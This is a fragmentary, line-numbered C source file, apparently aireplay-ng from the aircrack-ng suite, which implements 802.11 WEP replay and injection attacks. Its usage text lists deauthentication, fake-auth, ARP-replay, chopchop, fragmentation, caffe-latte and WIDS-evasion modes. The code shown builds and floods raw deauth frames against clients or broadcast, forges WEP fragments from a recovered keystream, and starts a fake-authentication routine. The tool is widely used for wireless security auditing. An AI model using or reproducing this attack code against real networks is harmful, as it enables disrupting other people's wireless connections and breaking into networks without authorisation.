2
* 802.11 WEP replay & injection attacks
4
* Copyright (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
5
* Copyright (C) 2004, 2005 Christophe Devine
7
* WEP decryption attack (chopchop) developed by KoreK
9
* This program is free software; you can redistribute it and/or modify
10
* it under the terms of the GNU General Public License as published by
11
* the Free Software Foundation; either version 2 of the License, or
12
* (at your option) any later version.
14
* This program is distributed in the hope that it will be useful,
15
* but WITHOUT ANY WARRANTY; without even the implied warranty of
16
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17
* GNU General Public License for more details.
19
* You should have received a copy of the GNU General Public License
20
* along with this program; if not, write to the Free Software
21
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
24
* In addition, as a special exception, the copyright holders give
25
* permission to link the code of portions of this program with the
26
* OpenSSL library under certain conditions as described in each
27
* individual source file, and distribute linked combinations
29
* You must obey the GNU General Public License in all respects
30
* for all of the code used other than OpenSSL. * If you modify
31
* file(s) with this exception, you may extend this exception to your
32
* version of the file(s), but you are not obligated to do so. * If you
33
* do not wish to do so, delete this exception statement from your
34
* version. * If you delete this exception statement from all source
35
* files in the program, then also delete it here.
39
#include <linux/rtc.h>
42
#include <sys/types.h>
43
#include <sys/socket.h>
44
#include <sys/ioctl.h>
48
#include <netinet/in.h>
49
#include <arpa/inet.h>
65
#include <netinet/in_systm.h>
66
#include <netinet/ip.h>
67
#include <netinet/tcp.h>
71
#include "osdep/osdep.h"
75
#define RTC_RESOLUTION 8192
85
"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
86
"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
89
"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
90
"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"
93
"\x00\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
94
"\xBB\xBB\xBB\xBB\xBB\xBB\xC0\x00\x31\x04\x64\x00"
97
"\x48\x01\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
98
"\xBB\xBB\xBB\xBB\xBB\xBB\xE0\x1B"
101
"\xB4\x00\x4E\x04\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC"
104
"\x01\x04\x02\x04\x0B\x16\x32\x08\x0C\x12\x18\x24\x30\x48\x60\x6C"
107
"\x40\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC" \
108
"\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00"
112
#define RATE_1M 1000000
113
#define RATE_2M 2000000
114
#define RATE_5_5M 5500000
115
#define RATE_11M 11000000
117
#define RATE_6M 6000000
118
#define RATE_9M 9000000
119
#define RATE_12M 12000000
120
#define RATE_18M 18000000
121
#define RATE_24M 24000000
122
#define RATE_36M 36000000
123
#define RATE_48M 48000000
124
#define RATE_54M 54000000
126
int bitrates[RATE_NUM]={RATE_1M, RATE_2M, RATE_5_5M, RATE_6M, RATE_9M, RATE_11M, RATE_12M, RATE_18M, RATE_24M, RATE_36M, RATE_48M, RATE_54M};
128
extern char * getVersion(char * progname, int maj, int min, int submin, int svnrev, int beta, int rc);
129
extern char * searchInside(const char * dir, const char * filename);
130
extern int maccmp(unsigned char *mac1, unsigned char *mac2);
131
extern unsigned char * getmac(char * macAddress, int strict, unsigned char * mac);
132
extern int check_crc_buf( unsigned char *buf, int len );
133
extern const unsigned long int crc_tbl[256];
134
extern const unsigned char crc_chop_tbl[256][4];
139
" %s - (C) 2006, 2007, 2008, 2009 Thomas d\'Otreppe\n"
140
" Original work: Christophe Devine\n"
141
" http://www.aircrack-ng.org\n"
143
" usage: aireplay-ng <options> <replay interface>\n"
147
" -b bssid : MAC address, Access Point\n"
148
" -d dmac : MAC address, Destination\n"
149
" -s smac : MAC address, Source\n"
150
" -m len : minimum packet length\n"
151
" -n len : maximum packet length\n"
152
" -u type : frame control, type field\n"
153
" -v subt : frame control, subtype field\n"
154
" -t tods : frame control, To DS bit\n"
155
" -f fromds : frame control, From DS bit\n"
156
" -w iswep : frame control, WEP bit\n"
157
" -D : disable AP detection\n"
161
" -x nbpps : number of packets per second\n"
162
" -p fctrl : set frame control word (hex)\n"
163
" -a bssid : set Access Point MAC address\n"
164
" -c dmac : set Destination MAC address\n"
165
" -h smac : set Source MAC address\n"
166
" -g value : change ring buffer size (default: 8)\n"
167
" -F : choose first matching packet\n"
169
" Fakeauth attack options:\n"
171
" -e essid : set target AP SSID\n"
172
" -o npckts : number of packets per burst (0=auto, default: 1)\n"
173
" -q sec : seconds between keep-alives\n"
174
" -y prga : keystream for shared key auth\n"
175
" -T n : exit after retry fake auth request n time\n"
177
" Arp Replay attack options:\n"
179
" -j : inject FromDS packets\n"
181
" Fragmentation attack options:\n"
183
" -k IP : set destination IP in fragments\n"
184
" -l IP : set source IP in fragments\n"
186
" Test attack options:\n"
188
" -B : activates the bitrate test\n"
191
" WIDS evasion options:\n"
192
" -y value : Use packets older than n packets\n"
198
" -i iface : capture packets from this interface\n"
199
" -r file : extract packets from this pcap file\n"
201
" Miscellaneous options:\n"
203
" -R : disable /dev/rtc usage\n"
205
" Attack modes (numbers can still be used):\n"
207
" --deauth count : deauthenticate 1 or all stations (-0)\n"
208
" --fakeauth delay : fake authentication with AP (-1)\n"
209
" --interactive : interactive frame selection (-2)\n"
210
" --arpreplay : standard ARP-request replay (-3)\n"
211
" --chopchop : decrypt/chopchop WEP packet (-4)\n"
212
" --fragment : generates valid keystream (-5)\n"
213
" --caffe-latte : query a client for new IVs (-6)\n"
214
" --cfrag : fragments against a client (-7)\n"
215
" --test : tests injection and quality (-9)\n"
217
" --help : Displays this usage screen\n"
223
unsigned char f_bssid[6];
224
unsigned char f_dmac[6];
225
unsigned char f_smac[6];
236
unsigned char r_bssid[6];
237
unsigned char r_dmac[6];
238
unsigned char r_smac[6];
239
unsigned char r_dip[4];
240
unsigned char r_sip[4];
245
char ip_out[16]; //16 for 15 chars + \x00
277
int fd_in, arptype_in;
278
int fd_out, arptype_out;
281
unsigned char mac_in[6];
282
unsigned char mac_out[6];
292
struct pcap_file_header pfh_in;
296
static struct wif *_wi_in, *_wi_out;
310
unsigned char essid[255];
311
unsigned char bssid[6];
313
unsigned int ping[REQUESTS];
317
struct APt ap[MAX_APS];
319
unsigned long nb_pkt_sent;
320
unsigned char h80211[4096];
321
unsigned char tmpbuf[4096];
322
unsigned char srcbuf[4096];
325
uchar ska_auth1[] = "\xb0\x00\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
326
"\x00\x00\x00\x00\x00\x00\xb0\x01\x01\x00\x01\x00\x00\x00";
328
uchar ska_auth3[4096] = "\xb0\x40\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
329
"\x00\x00\x00\x00\x00\x00\xc0\x01";
337
void sighandler( int signum )
339
if( signum == SIGINT )
342
if( signum == SIGALRM )
349
if(_wi_in != _wi_out)
372
/* open the replay interface */
373
_wi_out = wi_open(opt.iface_out);
376
dev.fd_out = wi_fd(_wi_out);
378
/* open the packet source */
379
if( opt.s_face != NULL )
381
_wi_in = wi_open(opt.s_face);
384
dev.fd_in = wi_fd(_wi_in);
385
wi_get_mac(_wi_in, dev.mac_in);
390
dev.fd_in = dev.fd_out;
393
dev.arptype_in = dev.arptype_out;
394
wi_get_mac(_wi_in, dev.mac_in);
397
wi_get_mac(_wi_out, dev.mac_out);
402
int set_bitrate(struct wif *wi, int rate)
406
if( wi_set_rate(wi, rate) )
409
// if( reset_ifaces() )
412
//Workaround for buggy drivers (rt73) that do not accept 5.5M, but 5M instead
413
if (rate == 5500000 && wi_get_rate(wi) != 5500000) {
414
if( wi_set_rate(wi, 5000000) )
418
newrate = wi_get_rate(wi);
419
for(i=0; i<RATE_NUM; i++)
421
if(bitrates[i] == rate)
426
if( newrate != rate )
432
if(bitrates[i-1] >= newrate)
434
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
440
if(bitrates[i+1] <= newrate)
442
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
448
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
454
int send_packet(void *buf, size_t count)
456
struct wif *wi = _wi_out; /* XXX globals suck */
457
unsigned char *pkt = (unsigned char*) buf;
459
if( (count > 24) && (pkt[1] & 0x04) == 0 && (pkt[22] & 0x0F) == 0)
461
pkt[22] = (nb_pkt_sent & 0x0000000F) << 4;
462
pkt[23] = (nb_pkt_sent & 0x00000FF0) >> 4;
465
if (wi_write(wi, buf, count, NULL) == -1) {
470
return 0; /* XXX not sure I like this... -sorbo */
473
perror("wi_write()");
481
int read_packet(void *buf, size_t count, struct rx_info *ri)
483
struct wif *wi = _wi_in; /* XXX */
486
rc = wi_read(wi, buf, count, ri);
500
void read_sleep( int usec )
502
struct timeval tv, tv2, tv3;
506
gettimeofday(&tv, NULL);
507
gettimeofday(&tv2, NULL);
512
while( ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) < (usec) )
515
FD_SET( dev.fd_in, &rfds );
517
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv3 ) < 0 )
522
if( FD_ISSET( dev.fd_in, &rfds ) )
523
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
525
gettimeofday(&tv2, NULL);
530
int filter_packet( unsigned char *h80211, int caplen )
532
int z, mi_b, mi_s, mi_d, ext=0, qos;
537
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
538
if ( ( h80211[0] & 0x80 ) == 0x80 )
540
qos = 1; /* 802.11e QoS */
544
if( (h80211[0] & 0x0C) == 0x08) //if data packet
545
ext = z-24; //how many bytes longer than default ieee80211 header
548
if( caplen-ext < opt.f_minlen ||
549
caplen-ext > opt.f_maxlen ) return( 1 );
551
/* check the frame control bytes */
553
if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
554
opt.f_type >= 0 ) return( 1 );
556
if( ( h80211[0] & 0x70 ) != (( opt.f_subtype << 4 ) & 0x70) && //ignore the leading bit (QoS)
557
opt.f_subtype >= 0 ) return( 1 );
559
if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
560
opt.f_tods >= 0 ) return( 1 );
562
if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
563
opt.f_fromds >= 0 ) return( 1 );
565
if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
566
opt.f_iswep >= 0 ) return( 1 );
568
/* check the extended IV (TKIP) flag */
570
if( opt.f_type == 2 && opt.f_iswep == 1 &&
571
( h80211[z + 3] & 0x20 ) != 0 ) return( 1 );
573
/* MAC address checking */
575
switch( h80211[1] & 3 )
577
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
578
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
579
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
580
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
583
if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
584
if( memcmp( h80211 + mi_b, opt.f_bssid, 6 ) != 0 )
587
if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
588
if( memcmp( h80211 + mi_s, opt.f_smac, 6 ) != 0 )
591
if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
592
if( memcmp( h80211 + mi_d, opt.f_dmac, 6 ) != 0 )
595
/* this one looks good */
600
int wait_for_beacon(uchar *bssid, uchar *capa, char *essid)
602
int len = 0, chan = 0, taglen = 0, tagtype = 0, pos = 0;
603
uchar pkt_sniff[4096];
604
struct timeval tv,tv2;
607
gettimeofday(&tv, NULL);
613
len = read_packet(pkt_sniff, sizeof(pkt_sniff), NULL);
615
gettimeofday(&tv2, NULL);
616
if(((tv2.tv_sec-tv.tv_sec)*1000000) + (tv2.tv_usec-tv.tv_usec) > 10000*1000) //wait 10sec for beacon frame
620
if(len <= 0) usleep(1);
622
if (! memcmp(pkt_sniff, "\x80", 1))
625
taglen = 22; //initial value to get the fixed tags parsing started
626
taglen+= 12; //skip fixed tags in frames
630
tagtype = pkt_sniff[pos];
631
taglen = pkt_sniff[pos+1];
632
} while(tagtype != 3 && pos < len-2);
634
if(tagtype != 3) continue;
635
if(taglen != 1) continue;
636
if(pos+2+taglen > len) continue;
638
chan = pkt_sniff[pos+2];
643
taglen = 22; //initial value to get the fixed tags parsing started
644
taglen+= 12; //skip fixed tags in frames
648
tagtype = pkt_sniff[pos];
649
taglen = pkt_sniff[pos+1];
650
} while(tagtype != 0 && pos < len-2);
652
if(tagtype != 0) continue;
655
if (memcmp(bssid, pkt_sniff+10, 6) == 0) break;
658
if(pos+2+taglen > len) continue;
660
if(taglen > 32)taglen = 32;
662
if((pkt_sniff+pos+2)[0] < 32 && memcmp(bssid, pkt_sniff+10, 6) == 0)
667
/* if bssid is given, copy essid */
668
if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strlen(essid) == 0)
670
memset(essid, 0, 33);
671
memcpy(essid, pkt_sniff+pos+2, taglen);
675
/* if essid is given, copy bssid AND essid, so we can handle case insensitive arguments */
676
if(bssid != NULL && memcmp(bssid, NULL_MAC, 6) == 0 && strncasecmp(essid, (char*)pkt_sniff+pos+2, taglen) == 0 && strlen(essid) == (unsigned)taglen)
678
memset(essid, 0, 33);
679
memcpy(essid, pkt_sniff+pos+2, taglen);
680
memcpy(bssid, pkt_sniff+10, 6);
681
printf("Found BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\" to given ESSID \"%s\".\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5], essid);
685
/* if essid and bssid are given, check both */
686
if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strlen(essid) > 0)
688
memset(essid2, 0, 33);
689
memcpy(essid2, pkt_sniff+pos+2, taglen);
690
if(strncasecmp(essid, essid2, taglen) == 0 && strlen(essid) == (unsigned)taglen)
694
printf("For the given BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\", there is an ESSID mismatch!\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5]);
695
printf("Found ESSID \"%s\" vs. specified ESSID \"%s\"\n", essid2, essid);
696
printf("Using the given one, double check it to be sure its correct!\n");
704
if(capa) memcpy(capa, pkt_sniff+34, 2);
710
if bssid != NULL its looking for a beacon frame
712
int attack_check(uchar* bssid, char* essid, uchar* capa, struct wif *wi)
714
int ap_chan=0, iface_chan=0;
716
iface_chan = wi_get_channel(wi);
720
ap_chan = wait_for_beacon(bssid, capa, essid);
723
PCT; printf("No such BSSID available.\n");
726
if(ap_chan != iface_chan)
728
PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_get_ifname(wi), iface_chan, ap_chan);
736
int getnet( uchar* capa, int filter, int force)
738
unsigned char *bssid;
749
if( memcmp(bssid, NULL_MAC, 6) )
751
PCT; printf("Waiting for beacon frame (BSSID: %02X:%02X:%02X:%02X:%02X:%02X) on channel %d\n",
752
bssid[0],bssid[1],bssid[2],bssid[3],bssid[4],bssid[5],wi_get_channel(_wi_in));
754
else if(strlen(opt.r_essid) > 0)
756
PCT; printf("Waiting for beacon frame (ESSID: %s) on channel %d\n", opt.r_essid,wi_get_channel(_wi_in));
763
printf("Please specify at least a BSSID (-b) or an ESSID (-e)\n");
767
printf("Please specify at least a BSSID (-a) or an ESSID (-e)\n");
774
if( attack_check(bssid, opt.r_essid, capa, _wi_in) != 0)
776
if(memcmp(bssid, NULL_MAC, 6))
778
if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32)
780
printf( "Please specify an ESSID (-e).\n" );
784
if(!memcmp(bssid, NULL_MAC, 6))
786
if(strlen(opt.r_essid) > 0)
788
printf( "Please specify a BSSID (-a).\n" );
797
int xor_keystream(uchar *ph80211, uchar *keystream, int len)
801
for (i=0; i<len; i++) {
802
ph80211[i] = ph80211[i] ^ keystream[i];
808
int capture_ask_packet( int *caplen, int just_grab )
816
int i, j, n, mi_b=0, mi_s=0, mi_d=0, mi_t=0, mi_r=0, is_wds=0, key_index_offset;
820
struct pcap_file_header pfh_out;
821
struct pcap_pkthdr pkh;
823
if( opt.f_minlen < 0 ) opt.f_minlen = 40;
824
if( opt.f_maxlen < 0 ) opt.f_maxlen = 1500;
825
if( opt.f_type < 0 ) opt.f_type = 2;
826
if( opt.f_subtype < 0 ) opt.f_subtype = 0;
827
if( opt.f_iswep < 0 ) opt.f_iswep = 1;
833
signal( SIGINT, SIG_DFL );
837
if( time( NULL ) - tr > 0 )
840
printf( "\rRead %ld packets...\r", nb_pkt_read );
844
if( opt.s_file == NULL )
847
FD_SET( dev.fd_in, &rfds );
852
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
854
if( errno == EINTR ) continue;
855
perror( "select failed" );
859
if( ! FD_ISSET( dev.fd_in, &rfds ) )
862
gettimeofday( &tv, NULL );
864
*caplen = read_packet( h80211, sizeof( h80211 ), NULL );
866
if( *caplen < 0 ) return( 1 );
867
if( *caplen == 0 ) continue;
871
/* there are no hidden backdoors in this source code */
875
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
877
printf( "\r\33[KEnd of file.\n" );
881
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
882
SWAP32( pkh.caplen );
884
tv.tv_sec = pkh.tv_sec;
885
tv.tv_usec = pkh.tv_usec;
887
n = *caplen = pkh.caplen;
889
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
891
printf( "\r\33[KInvalid packet length %d.\n", n );
895
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
897
printf( "\r\33[KEnd of file.\n" );
901
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
903
/* remove the prism header */
905
if( h80211[7] == 0x40 )
908
n = *(int *)( h80211 + 4 );
910
if( n < 8 || n >= (int) *caplen )
913
memcpy( tmpbuf, h80211, *caplen );
915
memcpy( h80211, tmpbuf + n, *caplen );
918
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
920
/* remove the radiotap header */
922
n = *(unsigned short *)( h80211 + 2 );
924
if( n <= 0 || n >= (int) *caplen )
927
memcpy( tmpbuf, h80211, *caplen );
929
memcpy( h80211, tmpbuf + n, *caplen );
932
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
934
/* remove the PPI header */
936
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
938
if( n <= 0 || n>= (int) *caplen )
941
/* for a while Kismet logged broken PPI headers */
942
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
945
if( n <= 0 || n>= (int) *caplen )
948
memcpy( tmpbuf, h80211, *caplen );
950
memcpy( h80211, tmpbuf + n, *caplen );
956
if( filter_packet( h80211, *caplen ) != 0 )
962
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
963
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
966
switch( h80211[1] & 3 )
968
case 0: mi_b = 16; mi_s = 10; mi_d = 4; is_wds = 0; break;
969
case 1: mi_b = 4; mi_s = 10; mi_d = 16; is_wds = 0; break;
970
case 2: mi_b = 10; mi_s = 16; mi_d = 4; is_wds = 0; break;
971
case 3: mi_t = 10; mi_r = 4; mi_d = 16; mi_s = 24; is_wds = 1; break; // WDS packet
974
printf( "\n\n Size: %d, FromDS: %d, ToDS: %d",
975
*caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
977
if( ( h80211[0] & 0x0C ) == 8 && ( h80211[1] & 0x40 ) != 0 )
979
// if (is_wds) key_index_offset = 33; // WDS packets have an additional MAC, so the key index is at byte 33
980
// else key_index_offset = 27;
981
key_index_offset = z+3;
983
if( ( h80211[key_index_offset] & 0x20 ) == 0 )
992
printf( " Transmitter = %02X:%02X:%02X:%02X:%02X:%02X\n",
993
h80211[mi_t ], h80211[mi_t + 1],
994
h80211[mi_t + 2], h80211[mi_t + 3],
995
h80211[mi_t + 4], h80211[mi_t + 5] );
997
printf( " Receiver = %02X:%02X:%02X:%02X:%02X:%02X\n",
998
h80211[mi_r ], h80211[mi_r + 1],
999
h80211[mi_r + 2], h80211[mi_r + 3],
1000
h80211[mi_r + 4], h80211[mi_r + 5] );
1002
printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
1003
h80211[mi_b ], h80211[mi_b + 1],
1004
h80211[mi_b + 2], h80211[mi_b + 3],
1005
h80211[mi_b + 4], h80211[mi_b + 5] );
1008
printf( " Dest. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
1009
h80211[mi_d ], h80211[mi_d + 1],
1010
h80211[mi_d + 2], h80211[mi_d + 3],
1011
h80211[mi_d + 4], h80211[mi_d + 5] );
1013
printf( " Source MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
1014
h80211[mi_s ], h80211[mi_s + 1],
1015
h80211[mi_s + 2], h80211[mi_s + 3],
1016
h80211[mi_s + 4], h80211[mi_s + 5] );
1018
/* print a hex dump of the packet */
1020
for( i = 0; i < *caplen; i++ )
1022
if( ( i & 15 ) == 0 )
1026
printf( "\n --- CUT ---" );
1030
printf( "\n 0x%04x: ", i );
1033
printf( "%02x", h80211[i] );
1035
if( ( i & 1 ) != 0 )
1038
if( i == *caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
1040
for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
1043
if( ( j & 1 ) != 0 )
1049
for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
1050
printf( "%c", ( h80211[i - 15 + j] < 32 ||
1051
h80211[i - 15 + j] > 126 )
1052
? '.' : h80211[i - 15 + j] );
1055
if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
1059
for( j = 0; j < 16; j++ )
1060
printf( "%c", ( h80211[i - 15 + j] < 32 ||
1061
h80211[i - 15 + j] > 127 )
1062
? '.' : h80211[i - 15 + j] );
1066
printf( "\n\nUse this packet ? " );
1069
while(!ret) ret = scanf( "%s", tmpbuf );
1072
if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' )
1078
pfh_out.magic = TCPDUMP_MAGIC;
1079
pfh_out.version_major = PCAP_VERSION_MAJOR;
1080
pfh_out.version_minor = PCAP_VERSION_MINOR;
1081
pfh_out.thiszone = 0;
1082
pfh_out.sigfigs = 0;
1083
pfh_out.snaplen = 65535;
1084
pfh_out.linktype = LINKTYPE_IEEE802_11;
1086
lt = localtime( (const time_t *) &tv.tv_sec );
1088
memset( strbuf, 0, sizeof( strbuf ) );
1089
snprintf( strbuf, sizeof( strbuf ) - 1,
1090
"replay_src-%02d%02d-%02d%02d%02d.cap",
1091
lt->tm_mon + 1, lt->tm_mday,
1092
lt->tm_hour, lt->tm_min, lt->tm_sec );
1094
printf( "Saving chosen packet in %s\n", strbuf );
1096
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
1098
perror( "fopen failed" );
1102
n = sizeof( struct pcap_file_header );
1104
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
1107
perror( "fwrite failed\n" );
1111
pkh.tv_sec = tv.tv_sec;
1112
pkh.tv_usec = tv.tv_usec;
1113
pkh.caplen = *caplen;
1118
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 )
1121
perror( "fwrite failed" );
1127
if( fwrite( h80211, n, 1, f_cap_out ) != 1 )
1130
perror( "fwrite failed" );
1134
fclose( f_cap_out );
1140
int read_prga(unsigned char **dest, char *file)
1145
if(file == NULL) return( 1 );
1146
if(*dest == NULL) *dest = (unsigned char*) malloc(1501);
1148
f = fopen(file, "r");
1152
printf("Error opening %s\n", file);
1156
fseek(f, 0, SEEK_END);
1160
if(size > 1500) size = 1500;
1162
if( fread( (*dest), size, 1, f ) != 1 )
1165
fprintf( stderr, "fread failed\n" );
1175
void add_icv(uchar *input, int len, int offset)
1177
unsigned long crc = 0xFFFFFFFF;
1180
for( n = offset; n < len; n++ )
1181
crc = crc_tbl[(crc ^ input[n]) & 0xFF] ^ (crc >> 8);
1185
input[len] = (crc ) & 0xFF;
1186
input[len+1] = (crc >> 8) & 0xFF;
1187
input[len+2] = (crc >> 16) & 0xFF;
1188
input[len+3] = (crc >> 24) & 0xFF;
1193
void send_fragments(uchar *packet, int packet_len, uchar *iv, uchar *keystream, int fragsize, int ska)
1197
uchar frag[32+fragsize];
1201
data_size = packet_len-header_size;
1202
packet[23] = (rand() % 0xFF);
1204
for (t=0; t+=fragsize;)
1208
memcpy(frag, packet, header_size);
1210
//Copy IV + KeyIndex
1211
memcpy(frag+header_size, iv, 4);
1214
if(fragsize <= packet_len-(header_size+t-fragsize))
1215
memcpy(frag+header_size+4, packet+header_size+t-fragsize, fragsize);
1217
memcpy(frag+header_size+4, packet+header_size+t-fragsize, packet_len-(header_size+t-fragsize));
1227
if (t< data_size) frag[1] |= 4;
1228
if (t>=data_size) frag[1] &= 251;
1232
for (u=t; u-=fragsize;)
1238
//Calculate packet length
1239
if(fragsize <= packet_len-(header_size+t-fragsize))
1240
pack_size = header_size + 4 + fragsize;
1242
pack_size = header_size + 4 + (packet_len-(header_size+t-fragsize));
1245
add_icv(frag, pack_size, header_size + 4);
1249
xor_keystream(frag + header_size + 4, keystream, fragsize+4);
1252
send_packet(frag, pack_size);
1253
if (t<data_size)usleep(100);
1255
if (t>=data_size) break;
1260
int do_attack_deauth( void )
1263
int aacks, sacks, caplen;
1267
if(getnet(NULL, 0, 1) != 0)
1270
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
1271
printf( "NB: this attack is more effective when targeting\n"
1272
"a connected wireless client (-c <client's mac>).\n" );
1278
if( opt.a_count > 0 && ++n > opt.a_count )
1283
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
1285
/* deauthenticate the target */
1287
memcpy( h80211, DEAUTH_REQ, 26 );
1288
memcpy( h80211 + 16, opt.r_bssid, 6 );
1292
for( i = 0; i < 64; i++ )
1296
PCT; printf( "Sending 64 directed DeAuth. STMAC:"
1297
" [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
1298
opt.r_dmac[0], opt.r_dmac[1],
1299
opt.r_dmac[2], opt.r_dmac[3],
1300
opt.r_dmac[4], opt.r_dmac[5],
1304
memcpy( h80211 + 4, opt.r_dmac, 6 );
1305
memcpy( h80211 + 10, opt.r_bssid, 6 );
1307
if( send_packet( h80211, 26 ) < 0 )
1312
memcpy( h80211 + 4, opt.r_bssid, 6 );
1313
memcpy( h80211 + 10, opt.r_dmac, 6 );
1315
if( send_packet( h80211, 26 ) < 0 )
1323
FD_SET( dev.fd_in, &rfds );
1328
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
1330
if( errno == EINTR ) continue;
1331
perror( "select failed" );
1335
if( ! FD_ISSET( dev.fd_in, &rfds ) )
1338
caplen = read_packet( tmpbuf, sizeof( tmpbuf ), NULL );
1340
if(caplen <= 0 ) break;
1341
if(caplen != 10) continue;
1342
if( tmpbuf[0] == 0xD4)
1344
if( memcmp(tmpbuf+4, opt.r_dmac, 6) == 0 )
1348
if( memcmp(tmpbuf+4, opt.r_bssid, 6) == 0 )
1352
PCT; printf( "Sending 64 directed DeAuth. STMAC:"
1353
" [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
1354
opt.r_dmac[0], opt.r_dmac[1],
1355
opt.r_dmac[2], opt.r_dmac[3],
1356
opt.r_dmac[4], opt.r_dmac[5],
1365
/* deauthenticate all stations */
1367
PCT; printf( "Sending DeAuth to broadcast -- BSSID:"
1368
" [%02X:%02X:%02X:%02X:%02X:%02X]\n",
1369
opt.r_bssid[0], opt.r_bssid[1],
1370
opt.r_bssid[2], opt.r_bssid[3],
1371
opt.r_bssid[4], opt.r_bssid[5] );
1373
memcpy( h80211, DEAUTH_REQ, 26 );
1375
memcpy( h80211 + 4, BROADCAST, 6 );
1376
memcpy( h80211 + 10, opt.r_bssid, 6 );
1377
memcpy( h80211 + 16, opt.r_bssid, 6 );
1379
for( i = 0; i < 128; i++ )
1381
if( send_packet( h80211, 26 ) < 0 )
1392
int do_attack_fake_auth( void )
1395
struct timeval tv, tv2, tv3;
1398
int i, n, state, caplen, z;
1399
int mi_b, mi_s, mi_d;
1416
unsigned char ackbuf[14];
1417
unsigned char ctsbuf[10];
1418
unsigned char iv[4];
1419
unsigned char challenge[2048];
1420
unsigned char keystream[2048];
1423
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
1425
printf( "Please specify a source MAC (-h).\n" );
1429
if(getnet(capa, 0, 1) != 0)
1432
if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32)
1434
printf( "Please specify an ESSID (-e).\n" );
1438
memcpy( ackbuf, "\xD4\x00\x00\x00", 4 );
1439
memcpy( ackbuf + 4, opt.r_bssid, 6 );
1440
memset( ackbuf + 10, 0, 4 );
1442
memcpy( ctsbuf, "\xC4\x00\x94\x02", 4 );
1443
memcpy( ctsbuf + 4, opt.r_bssid, 6 );
1448
x_send=opt.npackets;
1449
if(opt.npackets == 0)
1452
